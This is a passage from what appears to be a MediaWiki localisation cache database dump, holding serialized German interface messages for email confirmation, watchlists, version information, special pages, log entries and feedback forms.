E-Mail-Funktionen benutzen kannst. Klicke bitte auf die unten stehende, mit „Bestätigungscode zuschicken“ beschriftete Schaltfläche, damit eine automatisch erstellte E-Mail an die angegebene Adresse geschickt wird. Diese E-Mail enthält eine Web-Adresse mit einem Bestätigungscode. Indem du diese Webseite in deinem Webbrowser öffnest, bestätigst du, dass die angegebene E-Mail-Adresse korrekt und gültig ist.\";'),('de','messages:confirmemail_pending','s:212:\"Es wurde dir bereits ein Bestätigungscode per E-Mail zugeschickt.\nWenn du dein Benutzerkonto erst vor kurzem erstellt hast, warte bitte noch ein paar Minuten auf die E-Mail, bevor du einen neuen Code anforderst.\";'),('de','messages:confirmemail_send','s:28:\"Bestätigungscode zuschicken\";'),('de','messages:confirmemail_sent','s:42:\"Die Bestätigungs-E-Mail wurde verschickt.\";'),('de','messages:confirmemail_oncreate','s:198:\"Ein Bestätigungs-Code wurde an deine E-Mail-Adresse gesandt. Dieser Code wird für die Anmeldung nicht benötigt, jedoch wird er zur Aktivierung der E-Mail-Funktionen innerhalb des Wikis gebraucht.\";'),('de','messages:confirmemail_sendfailed','s:159:\"{{SITENAME}} konnte die Bestätigungs-E-Mail nicht an dich versenden.\nBitte prüfe die E-Mail-Adresse auf ungültige Zeichen.\n\nRückmeldung des Mailservers: $1\";'),('de','messages:confirmemail_invalid','s:138:\"Ungültiger Bestätigungscode. Möglicherweise ist der Bestätigungszeitraum verstrichen. Versuche bitte, die Bestätigung zu wiederholen.\";'),('de','messages:confirmemail_needlogin','s:57:\"Du musst dich $1, um deine E-Mail-Adresse zu bestätigen.\";'),('de','messages:confirmemail_success','s:103:\"Deine E-Mail-Adresse wurde erfolgreich bestätigt. Du kannst dich jetzt [[Special:UserLogin|anmelden]].\";'),('de','messages:confirmemail_loggedin','s:50:\"Deine E-Mail-Adresse wurde erfolgreich bestätigt.\";'),('de','messages:confirmemail_subject','s:46:\"[{{SITENAME}}] Bestätigung der E-Mail-Adresse\";'),('de','messages:confirmemail_body','s:534:\"Hallo,\n\njemand mit der IP-Adresse $1, wahrscheinlich du selbst, hat das Benutzerkonto „$2“ bei {{SITENAME}} registriert.\n\nUm die E-Mail-Funktionen von {{SITENAME}} (wieder) zu aktivieren und um zu bestätigen,\ndass dieses Benutzerkonto wirklich zu deiner E-Mail-Adresse und damit zu dir gehört, öffne bitte folgenden Link in deinem Browser:\n\n$3\n\nWenn du das genannte Benutzerkonto *nicht* registriert hast, folge diesem Link, um den Bestätigungsprozess abzubrechen:\n\n$5\n\nDieser Bestätigungscode ist gültig bis zum $6, $7 Uhr.\";'),('de','messages:confirmemail_body_changed','s:470:\"Jemand mit der IP-Adresse $1, wahrscheinlich du selbst,\nhat die E-Mail-Adresse des Benutzerkontos „$2“ zu dieser Adresse bei {{SITENAME}} geändert.\n\nUm zu bestätigen, dass dieses Benutzerkonto wirklich dir gehört,\nund um die E-Mail-Features bei {{SITENAME}} zu reaktivieren, öffne diesen Link in deinem Browser:\n\n$3\n\nFalls das Konto *nicht* dir gehört, folge diesem Link,\num die E-Mail-Bestätigung abzubrechen:\n\n$5\n\nDieser Bestätigungscode ist gültig bis $4.\";'),('de','messages:confirmemail_body_set','s:528:\"Jemand mit der IP-Adresse $1, wahrscheinlich du selbst,\nhat die E-Mail-Adresse des Benutzerkontos „$2“ auf {{SITENAME}} zu dieser E-Mail-Adresse abgeändert.\n\nUm zu bestätigen, dass dieses Benutzerkonto wirklich zu dir gehört\nund um die E-Mail-Funktionen auf {{SITENAME}} zu aktivieren, öffne bitte den folgenden Link in deinem Browser:\n\n$3\n\nFalls das Konto *nicht* zu dir gehört, bitte den nachfolgenden Link öffnen,\num die Bestätigung der E-Mail-Adresse abzubrechen:\n\n$5\n\nDieser Bestätigungscode ist gültig bis $4.\";'),('de','messages:confirmemail_invalidated','s:48:\"Die E-Mail-Adressbestätigung wurde abgebrochen.\";'),('de','messages:invalidateemail','s:35:\"E-Mail-Adressbestätigung abbrechen\";'),('de','messages:scarytranscludedisabled','s:38:\"[Interwiki-Einbindung ist deaktiviert]\";'),('de','messages:scarytranscludefailed','s:44:\"[Vorlageneinbindung für $1 ist gescheitert]\";'),('de','messages:scarytranscludefailed-httpstatus','s:48:\"[Vorlagenabruf fehlgeschlagen für $1: HTTP $2]\";'),('de','messages:scarytranscludetoolong','s:17:\"[URL ist zu lang]\";'),('de','messages:deletedwhileediting','s:262:\"Achtung: Diese Seite wurde gelöscht, nachdem du angefangen hast, sie zu bearbeiten!\nIm [{{fullurl:{{#special:Log}}|type=delete&page={{FULLPAGENAMEE}}}} Lösch-Logbuch] findest du den Grund für die Löschung. Wenn du die Seite speicherst, wird sie neu angelegt.\";'),('de','messages:confirmrecreate','s:231:\"Benutzer [[User:$1|$1]] ([[User talk:$1|Diskussion]]) hat diese Seite gelöscht, nachdem du angefangen hast, sie zu bearbeiten. Die Begründung lautete:\n:\'\'$2\'\'\nBitte bestätige, dass du diese Seite wirklich neu erstellen möchten.\";'),('de','messages:confirmrecreate-noreason','s:200:\"Benutzer [[User:$1|$1 ]] ([[User talk:$1|Diskussion]]) hat diese Seite gelöscht, nachdem du mit der Bearbeitung begonnen hast. Bitte bestätige, dass du die Seite wirklich erneut erstellen möchtest.\";'),('de','messages:recreate','s:14:\"Erneut anlegen\";'),('de','messages:confirm_purge_button','s:2:\"OK\";'),('de','messages:confirm-purge-top','s:42:\"Diese Seite aus dem Server-Cache löschen?\";'),('de','messages:confirm-purge-bottom','s:75:\"Leert den Cache einer Seite und erzwingt die Anzeige der aktuellen Version.\";'),('de','messages:confirm-watch-button','s:2:\"OK\";'),('de','messages:confirm-watch-top','s:60:\"Diese Seite zur persönlichen Beobachtungsliste hinzufügen?\";'),('de','messages:confirm-unwatch-button','s:2:\"OK\";'),('de','messages:confirm-unwatch-top','s:62:\"Diese Seite von der persönlichen Beobachtungsliste entfernen?\";'),('de','messages:ellipsis','s:3:\"…\";'),('de','messages:percent','s:9:\"$1 %\";'),('de','messages:quotation-marks','s:8:\"„$1“\";'),('de','messages:imgmultipageprev','s:19:\"← vorherige Seite\";'),('de','messages:imgmultipagenext','s:18:\"nächste Seite →\";'),('de','messages:imgmultigo','s:2:\"OK\";'),('de','messages:imgmultigoto','s:16:\"Gehe zu Seite $1\";'),('de','messages:img-lang-default','s:17:\"(Standardsprache)\";'),('de','messages:img-lang-info','s:29:\"Dieses Bild in $1 rendern. $2\";'),('de','messages:img-lang-go','s:3:\"Los\";'),('de','messages:ascending_abbrev','s:3:\"auf\";'),('de','messages:descending_abbrev','s:2:\"ab\";'),('de','messages:table_pager_next','s:14:\"Nächste Seite\";'),('de','messages:table_pager_prev','s:15:\"Vorherige Seite\";'),('de','messages:table_pager_first','s:11:\"Erste Seite\";'),('de','messages:table_pager_last','s:12:\"Letzte Seite\";'),('de','messages:table_pager_limit','s:28:\"Zeige $1 Einträge pro Seite\";'),('de','messages:table_pager_limit_label','s:21:\"Positionen pro Seite:\";'),('de','messages:table_pager_limit_submit','s:3:\"Los\";'),('de','messages:table_pager_empty','s:16:\"Keine Ergebnisse\";'),('de','messages:autosumm-blank','s:24:\"Die Seite wurde geleert.\";'),('de','messages:autosumm-replace','s:65:\"Der Seiteninhalt wurde durch einen anderen Text ersetzt: „$1“\";'),('de','messages:autoredircomment','s:34:\"Weiterleitung nach [[$1]] erstellt\";'),('de','messages:autosumm-new','s:38:\"Die Seite wurde neu angelegt: „$1“\";'),('de','messages:autosumm-newblank','s:20:\"Leere Seite erstellt\";'),('de','messages:size-bytes','s:8:\"$1 Bytes\";'),('de','messages:size-megabytes','s:5:\"$1 MB\";'),('de','messages:size-gigabytes','s:5:\"$1 GB\";'),('de','messages:lag-warn-normal','s:104:\"Bearbeitungen der letzten {{PLURAL:$1|Sekunde|$1 Sekunden}} werden in dieser Liste noch nicht angezeigt.\";'),('de','messages:lag-warn-high','s:144:\"Auf Grund hoher Datenbankauslastung werden die Bearbeitungen der letzten {{PLURAL:$1|Sekunde|$1 Sekunden}} noch nicht in dieser Liste angezeigt.\";'),('de','messages:watchlistedit-normal-title','s:28:\"Beobachtungsliste bearbeiten\";'),('de','messages:watchlistedit-normal-legend','s:45:\"Einträge von der Beobachtungsliste entfernen\";'),('de','messages:watchlistedit-normal-explain','s:293:\"Dies sind die Einträge deiner Beobachtungsliste. Um Einträge zu entfernen, markiere die Kästchen neben den Einträgen und klicke am Ende der Seite auf „{{int:Watchlistedit-normal-submit}}“. Du kannst deine Beobachtungsliste auch im [[Special:EditWatchlist/raw|Listenformat bearbeiten]].\";'),('de','messages:watchlistedit-normal-submit','s:19:\"Einträge entfernen\";'),('de','messages:watchlistedit-normal-done','s:90:\"{{PLURAL:$1|Ein Eintrag wurde|$1 Einträge wurden}} von deiner Beobachtungsliste entfernt:\";'),('de','messages:watchlistedit-raw-title','s:44:\"Beobachtungsliste im Listenformat bearbeiten\";'),('de','messages:watchlistedit-raw-legend','s:44:\"Beobachtungsliste im Listenformat bearbeiten\";'),('de','messages:watchlistedit-raw-explain','s:328:\"Dies sind die Einträge deiner Beobachtungsliste im Listenformat. Die Einträge können zeilenweise gelöscht oder hinzugefügt werden.\nPro Zeile ist ein Eintrag erlaubt. Sobald du fertig bist, klicke auf „{{int:Watchlistedit-raw-submit}}“.\nDu kannst auch die [[Special:EditWatchlist|Standardseite]] zum Bearbeiten benutzen.\";'),('de','messages:watchlistedit-raw-titles','s:10:\"Einträge:\";'),('de','messages:watchlistedit-raw-submit','s:31:\"Beobachtungsliste aktualisieren\";'),('de','messages:watchlistedit-raw-done','s:42:\"Deine Beobachtungsliste wurde gespeichert.\";'),('de','messages:watchlistedit-raw-added','s:65:\"{{PLURAL:$1|Ein Eintrag wurde|$1 Einträge wurden}} hinzugefügt:\";'),('de','messages:watchlistedit-raw-removed','s:61:\"{{PLURAL:$1|Ein Eintrag wurde|$1 Einträge wurden}} entfernt:\";'),('de','messages:watchlistedit-clear-title','s:24:\"Beobachtungsliste leeren\";'),('de','messages:watchlistedit-clear-legend','s:24:\"Beobachtungsliste leeren\";'),('de','messages:watchlistedit-clear-explain','s:62:\"Alle Seitennamen werden von deiner Beobachtungsliste entfernt.\";'),('de','messages:watchlistedit-clear-titles','s:12:\"Seitennamen:\";'),('de','messages:watchlistedit-clear-submit','s:46:\"Beobachtungsliste leeren (Dies ist dauerhaft!)\";'),('de','messages:watchlistedit-clear-done','s:38:\"Deine Beobachtungsliste wurde geleert.\";'),('de','messages:watchlistedit-clear-removed','s:66:\"{{PLURAL:$1|Ein Seitenname wurde|$1 Seitennamen wurden}} entfernt:\";'),('de','messages:watchlistedit-too-many','s:42:\"Es gibt hier zu viele Seiten zum Anzeigen.\";'),('de','messages:watchlisttools-clear','s:24:\"Beobachtungsliste leeren\";'),('de','messages:watchlisttools-view','s:30:\"Beobachtungsliste: Änderungen\";'),('de','messages:watchlisttools-edit','s:17:\"normal bearbeiten\";'),('de','messages:watchlisttools-raw','s:42:\"im Listenformat bearbeiten (Import/Export)\";'),('de','messages:hijri-calendar-m3','s:15:\"Rabiʿ al-auwal\";'),('de','messages:hijri-calendar-m4','s:16:\"Rabiʿ ath-thani\";'),('de','messages:hijri-calendar-m5','s:15:\"Dschumada l-ula\";'),('de','messages:hijri-calendar-m6','s:21:\"Dschumada th-thaniyya\";'),('de','messages:hijri-calendar-m7','s:8:\"Radschab\";'),('de','messages:hijri-calendar-m8','s:9:\"Schaʿban\";'),('de','messages:hijri-calendar-m10','s:8:\"Schawwal\";'),('de','messages:hijri-calendar-m11','s:12:\"Dhu l-qaʿda\";'),('de','messages:hijri-calendar-m12','s:14:\"Dhu l-hiddscha\";'),('de','messages:signature','s:58:\"[[{{ns:user}}:$1|$2]] ([[{{ns:user_talk}}:$1|Diskussion]])\";'),('de','messages:unknown_extension_tag','s:30:\"Unbekanntes Parsertag „$1“\";'),('de','messages:duplicate-defaultsort','s:101:\"Achtung: Der Sortierungsschlüssel „$2“ überschreibt den vorher verwendeten Schlüssel „$1“.\";'),('de','messages:duplicate-displaytitle','s:102:\"Warnung: Der Anzeigetitel „$2“ überschreibt den früheren Anzeigetitel „$1“.\";'),('de','messages:version','s:7:\"Version\";'),('de','messages:version-extensions','s:26:\"Installierte Erweiterungen\";'),('de','messages:version-skins','s:33:\"Installierte Benutzeroberflächen\";'),('de','messages:version-specialpages','s:31:\"Erweiterungen mit Spezialseiten\";'),('de','messages:version-parserhooks','s:19:\"Parsererweiterungen\";'),('de','messages:version-variables','s:27:\"Erweiterungen mit Variablen\";'),('de','messages:version-antispam','s:23:\"Spamschutzerweiterungen\";'),('de','messages:version-api','s:17:\"API-Erweiterungen\";'),('de','messages:version-other','s:22:\"Sonstige Erweiterungen\";'),('de','messages:version-mediahandlers','s:27:\"Mediennutzungserweiterungen\";'),('de','messages:version-hooks','s:26:\"Schnittstellen \'\'(Hooks)\'\'\";'),('de','messages:version-parser-extensiontags','s:30:\"Parsererweiterungen \'\'(Tags)\'\'\";'),('de','messages:version-parser-function-hooks','s:36:\"Parsererweiterungen \'\'(Funktionen)\'\'\";'),('de','messages:version-hook-name','s:18:\"Schnittstellenname\";'),('de','messages:version-hook-subscribedby','s:10:\"Aufruf von\";'),('de','messages:version-version','s:4:\"($1)\";'),('de','messages:version-no-ext-name','s:11:\"[kein Name]\";'),('de','messages:version-svn-revision','s:12:\"(Version $2)\";'),('de','messages:version-license','s:16:\"MediaWiki-Lizenz\";'),('de','messages:version-ext-license','s:6:\"Lizenz\";'),('de','messages:version-ext-colheader-name','s:11:\"Bezeichnung\";'),('de','messages:version-skin-colheader-name','s:19:\"Benutzeroberfläche\";'),('de','messages:version-ext-colheader-version','s:7:\"Version\";'),('de','messages:version-ext-colheader-license','s:6:\"Lizenz\";'),('de','messages:version-ext-colheader-description','s:12:\"Beschreibung\";'),('de','messages:version-ext-colheader-credits','s:7:\"Autoren\";'),('de','messages:version-license-title','s:20:\"Lizenz für „$1“\";'),('de','messages:version-license-not-found','s:81:\"Es wurden keine detaillierten Lizenzinformationen zu dieser Erweiterung gefunden.\";'),('de','messages:version-credits-title','s:20:\"Danksagungen für $1\";'),('de','messages:version-credits-not-found','s:87:\"Es wurden keine detaillierten Danksagungsinformationen für diese Erweiterung gefunden.\";'),('de','messages:version-poweredby-credits','s:109:\"Diese Website nutzt \'\'\'[https://www.mediawiki.org/wiki/MediaWiki/de MediaWiki]\'\'\', Copyright © 2001–$1 $2.\";'),('de','messages:version-poweredby-others','s:6:\"andere\";'),('de','messages:version-poweredby-translators','s:37:\"die Übersetzer von translatewiki.net\";'),('de','messages:version-credits-summary','s:83:\"Wir danken folgenden Personen für ihre Beiträge zu [[Special:Version|MediaWiki]].\";'),('de','messages:version-license-info','s:1019:\"MediaWiki ist eine Freie Software, d. h. sie kann, gemäß den Bedingungen der von der Free Software Foundation veröffentlichten \'\'GNU General Public License\'\', weiterverteilt und/oder modifiziert werden. Dabei kann die Version 2, oder nach eigenem Ermessen, jede neuere Version der Lizenz verwendet werden.\n\nDie Software MediaWiki wird in der Hoffnung verteilt, dass sie nützlich sein wird, allerdings OHNE JEGLICHE GARANTIE und sogar ohne die implizierte Garantie einer MARKTGÄNGIGKEIT oder EIGNUNG FÜR EINEN BESTIMMTEN ZWECK. Hierzu sind weitere Hinweise in der \'\'GNU General Public License\'\' enthalten.\n\nEine [{{SERVER}}{{SCRIPTPATH}}/COPYING Kopie der \'\'GNU General Public License\'\'] sollte zusammen mit diesem Programm verteilt worden sein. Sofern dies nicht der Fall war, kann eine Kopie bei der Free Software Foundation Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA, schriftlich angefordert oder auf deren Website [//www.gnu.org/licenses/old-licenses/gpl-2.0.html online gelesen] werden.\";'),('de','messages:version-software','s:21:\"Installierte Software\";'),('de','messages:version-software-product','s:8:\"Software\";'),('de','messages:version-software-version','s:7:\"Version\";'),('de','messages:version-entrypoints','s:24:\"URLs der Einstiegspunkte\";'),('de','messages:version-entrypoints-header-entrypoint','s:14:\"Einstiegspunkt\";'),('de','messages:version-entrypoints-header-url','s:3:\"URL\";'),('de','messages:version-entrypoints-articlepath','s:85:\"[https://www.mediawiki.org/wiki/Special:MyLanguage/Manual:$wgArticlePath Artikelpfad]\";'),('de','messages:version-entrypoints-scriptpath','s:83:\"[https://www.mediawiki.org/wiki/Special:MyLanguage/Manual:$wgScriptPath Skriptpfad]\";'),('de','messages:redirect','s:64:\"Weiterleitung auf Benutzerseite, Seite, Seitenversion oder Datei\";'),('de','messages:redirect-legend','s:69:\"Weiterleitung auf eine Benutzerseite, Seite, Seitenversion oder Datei\";'),('de','messages:redirect-summary','s:380:\"Diese Spezialseite leitet auf eine Benutzerseite (numerische Benutzerkennung angegeben), Seite (Seitenkennung angegeben), Seitenversion (Versionskennung angegeben) oder Datei (Dateiname angegeben) weiter. Benutzung: [[{{#Special:Redirect}}/user/101]], [[{{#Special:Redirect}}/page/64308]], [[{{#Special:Redirect}}/revision/328429]] oder [[{{#Special:Redirect}}/file/Example.jpg]].\";'),('de','messages:redirect-submit','s:3:\"Los\";'),('de','messages:redirect-lookup','s:7:\"Suchen:\";'),('de','messages:redirect-value','s:23:\"Kennung oder Dateiname:\";'),('de','messages:redirect-user','s:13:\"Benutzerseite\";'),('de','messages:redirect-page','s:5:\"Seite\";'),('de','messages:redirect-revision','s:13:\"Seitenversion\";'),('de','messages:redirect-file','s:5:\"Datei\";'),('de','messages:redirect-not-exists','s:29:\"Der Wert wurde nicht gefunden\";'),('de','messages:fileduplicatesearch','s:18:\"Dateiduplikatsuche\";'),('de','messages:fileduplicatesearch-summary','s:54:\"Suche nach Dateiduplikaten auf Basis ihres Hashwertes.\";'),('de','messages:fileduplicatesearch-legend','s:21:\"Suche nach Duplikaten\";'),('de','messages:fileduplicatesearch-filename','s:10:\"Dateiname:\";'),('de','messages:fileduplicatesearch-submit','s:6:\"Suchen\";'),('de','messages:fileduplicatesearch-info','s:54:\"$1 × $2 Pixel
                                                                Dateigröße: $3
                                                                MIME-Typ: $4\";'),('de','messages:fileduplicatesearch-result-1','s:51:\"Die Datei „$1“ hat keine identischen Duplikate.\";'),('de','messages:fileduplicatesearch-result-n','s:84:\"Die Datei „$1“ hat {{PLURAL:$2|1 identisches Duplikat|$2 identische Duplikate}}.\";'),('de','messages:fileduplicatesearch-noresults','s:46:\"Es wurde keine Datei namens „$1“ gefunden.\";'),('de','messages:specialpages','s:13:\"Spezialseiten\";'),('de','messages:specialpages-note-top','s:7:\"Legende\";'),('de','messages:specialpages-note','s:112:\"* Normale Spezialseiten.\n* Spezialseiten mit beschränktem Zugang.\";'),('de','messages:specialpages-group-maintenance','s:14:\"Wartungslisten\";'),('de','messages:specialpages-group-other','s:20:\"Andere Spezialseiten\";'),('de','messages:specialpages-group-login','s:13:\"Benutzerkonto\";'),('de','messages:specialpages-group-changes','s:33:\"Letzte Änderungen und Logbücher\";'),('de','messages:specialpages-group-media','s:6:\"Medien\";'),('de','messages:specialpages-group-users','s:19:\"Benutzer und Rechte\";'),('de','messages:specialpages-group-highuse','s:23:\"Häufig benutzte Seiten\";'),('de','messages:specialpages-group-pages','s:12:\"Seitenlisten\";'),('de','messages:specialpages-group-pagetools','s:15:\"Seitenwerkzeuge\";'),('de','messages:specialpages-group-wiki','s:19:\"Daten und Werkzeuge\";'),('de','messages:specialpages-group-redirects','s:28:\"Weiterleitende Spezialseiten\";'),('de','messages:specialpages-group-spam','s:14:\"Spam-Werkzeuge\";'),('de','messages:blankpage','s:11:\"Leere Seite\";'),('de','messages:intentionallyblankpage','s:76:\"Diese Seite ist absichtlich ohne Inhalt. Sie wird für Benchmarks verwendet.\";'),('de','messages:external_image_whitelist','s:546:\" #Diese Zeile nicht verändern.
                                                                \n#Untenstehend können Fragmente regulärer Ausdrücke (der Teil zwischen den //) eingegeben werden.\n#Diese werden mit den URLs von Bildern aus externen Quellen verglichen.\n#Ein positiver Vergleich führt zur Anzeige des Bildes, andernfalls wird das Bild nur als Link angezeigt.\n#Zeilen, die mit einem # beginnen, werden als Kommentar behandelt.\n#Es wird nicht zwischen Groß- und Kleinschreibung unterschieden.\n\n#Fragmente regulärer Ausdrücke nach dieser Zeile eintragen. Diese Zeile nicht verändern.
                                                                \";'),('de','messages:tags','s:31:\"Gültige Änderungsmarkierungen\";'),('de','messages:tag-filter','s:36:\"[[Special:Tags|Markierungs]]-Filter:\";'),('de','messages:tag-filter-submit','s:6:\"Filter\";'),('de','messages:tag-list-wrapper','s:60:\"([[Special:Tags|{{PLURAL:$1|Markierung|Markierungen}}]]: $2)\";'),('de','messages:tags-title','s:12:\"Markierungen\";'),('de','messages:tags-intro','s:287:\"Diese Seite zeigt alle Markierungen, die für Bearbeitungen verwendet wurden, sowie deren Bedeutung. \n\nBei entsprechender Einstellung können die Missbrauchfilter beliebige Markierungen in die Versionsgeschichte setzen. Man kann die Versionsgeschichte dann nach den Markierungen filtern.\";'),('de','messages:tags-tag','s:15:\"Markierungsname\";'),('de','messages:tags-display-header','s:34:\"Benennung auf den Änderungslisten\";'),('de','messages:tags-description-header','s:26:\"Vollständige Beschreibung\";'),('de','messages:tags-active-header','s:6:\"Aktiv?\";'),('de','messages:tags-hitcount-header','s:21:\"Markierte Änderungen\";'),('de','messages:tags-active-yes','s:2:\"Ja\";'),('de','messages:tags-active-no','s:4:\"Nein\";'),('de','messages:tags-edit','s:10:\"bearbeiten\";'),('de','messages:tags-hitcount','s:38:\"$1 {{PLURAL:$1|Änderung|Änderungen}}\";'),('de','messages:comparepages','s:18:\"Seiten vergleichen\";'),('de','messages:compare-page1','s:7:\"Seite 1\";'),('de','messages:compare-page2','s:7:\"Seite 2\";'),('de','messages:compare-rev1','s:9:\"Version 1\";'),('de','messages:compare-rev2','s:9:\"Version 2\";'),('de','messages:compare-submit','s:11:\"Vergleichen\";'),('de','messages:compare-invalid-title','s:40:\"Der angegebene Seitenname ist ungültig.\";'),('de','messages:compare-title-not-exists','s:46:\"Der angegebene Seitenname ist nicht vorhanden.\";'),('de','messages:compare-revision-not-exists','s:43:\"Die angegebene Version ist nicht vorhanden.\";'),('de','messages:dberr-problems','s:68:\"Entschuldigung. Diese Seite hat momentan technische Schwierigkeiten.\";'),('de','messages:dberr-again','s:52:\"Warte einige Minuten und versuche dann neu zu laden.\";'),('de','messages:dberr-info','s:59:\"(Kann keine Verbindung zum Datenbank-Server herstellen: $1)\";'),('de','messages:dberr-info-hidden','s:71:\"(Es konnte keine Verbindung mit dem Datenbankserver hergestellt werden)\";'),('de','messages:dberr-usegoogle','s:51:\"Du könntest in der Zwischenzeit mit Google suchen.\";'),('de','messages:dberr-outofdate','s:74:\"Beachte, dass der Suchindex unserer Inhalte bei Google veraltet sein kann.\";'),('de','messages:dberr-cachederror','s:83:\"Folgendes ist eine Kopie des Caches der angeforderten Seite und kann veraltet sein.\";'),('de','messages:htmlform-invalid-input','s:52:\"Mit einer oder mehreren Eingabe(n) gibt es Probleme.\";'),('de','messages:htmlform-select-badoption','s:46:\"Der angegebene Wert ist keine gültige Option.\";'),('de','messages:htmlform-int-invalid','s:39:\"Der angegebene Wert ist keine Ganzzahl.\";'),('de','messages:htmlform-float-invalid','s:35:\"Der angegebene Wert ist keine Zahl.\";'),('de','messages:htmlform-int-toolow','s:48:\"Der angegebene Wert ist unter dem Minimum von $1\";'),('de','messages:htmlform-int-toohigh','s:48:\"Der angegebene Wert ist über dem Maximum von $1\";'),('de','messages:htmlform-required','s:26:\"Dieser Wert wird benötigt\";'),('de','messages:htmlform-submit','s:9:\"Speichern\";'),('de','messages:htmlform-reset','s:31:\"Änderungen rückgängig machen\";'),('de','messages:htmlform-selectorother-other','s:6:\"Andere\";'),('de','messages:htmlform-no','s:4:\"Nein\";'),('de','messages:htmlform-yes','s:2:\"Ja\";'),('de','messages:htmlform-chosen-placeholder','s:18:\"Wähle eine Option\";'),('de','messages:htmlform-cloner-create','s:19:\"Weitere hinzufügen\";'),('de','messages:htmlform-cloner-delete','s:9:\"Entfernen\";'),('de','messages:htmlform-cloner-required','s:40:\"Es ist mindestens ein Wert erforderlich.\";'),('de','messages:sqlite-has-fts','s:52:\"Version $1 mit Unterstützung für die Volltextsuche\";'),('de','messages:sqlite-no-fts','s:53:\"Version $1 ohne Unterstützung für die Volltextsuche\";'),('de','messages:logentry-delete-delete','s:34:\"$1 {{GENDER:$2|löschte}} Seite $3\";'),('de','messages:logentry-delete-restore','s:44:\"$1 {{GENDER:$2|stellte}} Seite $3 wieder her\";'),('de','messages:logentry-delete-event','s:115:\"$1 {{GENDER:$2|änderte}} die Sichtbarkeit {{PLURAL:$5|eines Logbucheintrags|von $5 Logbucheinträgen}} auf $3: $4\";'),('de','messages:logentry-delete-revision','s:104:\"$1 {{GENDER:$2|änderte}} die Sichtbarkeit {{PLURAL:$5|einer Version|von $5 Versionen}} der Seite $3: $4\";'),('de','messages:logentry-delete-event-legacy','s:71:\"$1 {{GENDER:$2|änderte}} die Sichtbarkeit von Logbucheinträgen auf $3\";'),('de','messages:logentry-delete-revision-legacy','s:69:\"$1 {{GENDER:$2|änderte}} die Sichtbarkeit von Versionen der Seite $3\";'),('de','messages:logentry-suppress-delete','s:39:\"$1 {{GENDER:$2|unterdrückte}} Seite $3\";'),('de','messages:logentry-suppress-event','s:122:\"$1 {{GENDER:$2|änderte}} diskret die Sichtbarkeit {{PLURAL:$5|eines Logbucheintrags|von $5 Logbucheinträgen}} auf $3: $4\";'),('de','messages:logentry-suppress-revision','s:112:\"$1 {{GENDER:$2|änderte}} diskret die Sichtbarkeit {{PLURAL:$5|einer Version|von $5 Versionen}} der Seite $3: $4\";'),('de','messages:logentry-suppress-event-legacy','s:79:\"$1 {{GENDER:$2|änderte}} diskret die Sichtbarkeit von Logbucheinträgen auf $3\";'),('de','messages:logentry-suppress-revision-legacy','s:77:\"$1 {{GENDER:$2|änderte}} diskret die Sichtbarkeit von Versionen der Seite $3\";'),('de','messages:revdelete-content-hid','s:16:\"Inhalt versteckt\";'),('de','messages:revdelete-summary-hid','s:25:\"Zusammenfassung versteckt\";'),('de','messages:revdelete-uname-hid','s:22:\"Benutzername versteckt\";'),('de','messages:revdelete-content-unhid','s:18:\"Inhalt freigegeben\";'),('de','messages:revdelete-summary-unhid','s:27:\"Zusammenfassung freigegeben\";'),('de','messages:revdelete-uname-unhid','s:24:\"Benutzername freigegeben\";'),('de','messages:revdelete-restricted','s:49:\"Einschränkungen gelten auch für Administratoren\";'),('de','messages:revdelete-unrestricted','s:48:\"Einschränkungen für Administratoren aufgehoben\";'),('de','messages:logentry-move-move','s:46:\"$1 {{GENDER:$2|verschob}} die Seite $3 nach $4\";'),('de','messages:logentry-move-move-noredirect','s:87:\"$1 {{GENDER:$2|verschob}} die Seite $3 nach $4, ohne dabei eine Weiterleitung anzulegen\";'),('de','messages:logentry-move-move_redir','s:88:\"$1 {{GENDER:$2|verschob}} die Seite $3 nach $4 und überschrieb dabei eine Weiterleitung\";'),('de','messages:logentry-move-move_redir-noredirect','s:130:\"$1 {{GENDER:$2|verschob}} die Seite $3 nach $4 und überschrieb dabei eine Weiterleitung, ohne selbst eine Weiterleitung anzulegen\";'),('de','messages:logentry-patrol-patrol','s:71:\"$1 {{GENDER:$2|markierte}} die Version $4 von Seite $3 als kontrolliert\";'),('de','messages:logentry-patrol-patrol-auto','s:83:\"$1 {{GENDER:$2|markierte}} automatisch die Version $4 von Seite $3 als kontrolliert\";'),('de','messages:logentry-newusers-newusers','s:45:\"Benutzerkonto $1 wurde {{GENDER:$2|erstellt}}\";'),('de','messages:logentry-newusers-create','s:45:\"Benutzerkonto $1 wurde {{GENDER:$2|erstellt}}\";'),('de','messages:logentry-newusers-create2','s:52:\"Benutzerkonto $3 wurde von $1 {{GENDER:$2|erstellt}}\";'),('de','messages:logentry-newusers-byemail','s:96:\"Benutzerkonto $3 wurde von $1 {{GENDER:$2|erstellt}} und das Passwort wurde per E-Mail zugesandt\";'),('de','messages:logentry-newusers-autocreate','s:57:\"Benutzerkonto $1 wurde automatisch {{GENDER:$2|erstellt}}\";'),('de','messages:logentry-rights-rights','s:72:\"$1 {{GENDER:$2|änderte}} die Gruppenzugehörigkeit für $3 von $4 zu $5\";'),('de','messages:logentry-rights-rights-legacy','s:59:\"$1 {{GENDER:$2|änderte}} die Gruppenzugehörigkeit für $3\";'),('de','messages:logentry-rights-autopromote','s:58:\"$1 wurde automatisch von $4 zu $5 {{GENDER:$2|zugeordnet}}\";'),('de','messages:logentry-upload-upload','s:28:\"$1 {{GENDER:$2|lud}} $3 hoch\";'),('de','messages:logentry-upload-overwrite','s:50:\"$1 {{GENDER:$2|lud}} eine neue Version von $3 hoch\";'),('de','messages:logentry-upload-revert','s:28:\"$1 {{GENDER:$2|lud}} $3 hoch\";'),('de','messages:rightsnone','s:5:\"(–)\";'),('de','messages:feedback-bugornote','s:343:\"Sofern du detailliert ein technisches Problem beschreiben möchtest, melde bitte [$1 einen Fehler].\nAnderenfalls kannst du auch das untenstehende einfache Formular nutzen. Dein Kommentar wird, zusammen mit deinem Benutzernamen und der Version des von dir verwendeten Webbrowsers sowie Betriebssystems, auf der Seite „[$3 $2]“ hinzugefügt.\";'),('de','messages:feedback-subject','s:8:\"Betreff:\";'),('de','messages:feedback-message','s:10:\"Nachricht:\";'),('de','messages:feedback-cancel','s:9:\"Abbrechen\";'),('de','messages:feedback-submit','s:19:\"Rückmeldung senden\";'),('de','messages:feedback-adding','s:44:\"Rückmeldung wird zur Seite hinzugefügt …\";'),('de','messages:feedback-error1','s:36:\"Fehler: Unbekanntes Ergebnis der API\";'),('de','messages:feedback-error2','s:31:\"Fehler: Bearbeitung gescheitert\";'),('de','messages:feedback-error3','s:33:\"Fehler: Keine Antwort von der 